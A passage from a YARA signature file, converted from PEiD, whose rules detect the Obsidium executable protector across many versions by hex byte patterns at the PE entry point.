EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }\r\n        $b = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 
64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 4F 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? 
?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? 
EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n        $b = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_11114_11115_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 
E8 3F 1D 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1357_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? 
E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1357_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? 
E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_unknown_version: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 50 EB 03 ?? ?? ?? E8 ?? 00 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 E7 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? 
EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 
50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 
33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 